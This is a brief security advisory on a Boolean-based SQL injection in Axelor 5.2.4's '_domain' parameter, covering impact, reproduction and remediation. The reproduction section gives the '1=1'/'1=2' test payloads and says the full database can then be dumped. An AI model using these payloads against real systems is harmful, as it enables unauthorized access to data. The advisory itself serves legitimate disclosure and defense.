Axelor Boolean-Based SQL Injection Vulnerability

A Boolean-based SQL injection vulnerability exists in Axelor version 5.2.4, specifically within the '_domain' parameter. This vulnerability allows attackers to manipulate SQL query logic, creating conditions that can lead to unauthorized data exposure or further exploitation.

Impact

Exploitation of this vulnerability allows for Boolean-based SQL injection, where an attacker can manipulate SQL queries to exfiltrate database content.

Reproduction

To reproduce this vulnerability, log into an Axelor account and intercept requests that include the '_domain' parameter. Insert a Boolean payload, such as '1=1', into the '_domain' parameter and observe the server's response. Then, replace the payload with '1=2' and note the difference in the response. This difference indicates that the SQL injection was successful. After confirming the injection, the entire database content can be dumped.

Remediation

To address this vulnerability, use parameterized queries or prepared statements to construct SQL queries. This practice separates SQL logic from user input, preventing injection attacks. Additionally, employ modern ORM libraries, such as Sequelize, Prisma, or TypeORM, to abstract raw SQL and enforce safe query practices. Finally, validate and sanitize input by enforcing strict input validation based on context, rejecting or sanitizing inputs that do not meet expected formats, and using allow-lists for validation.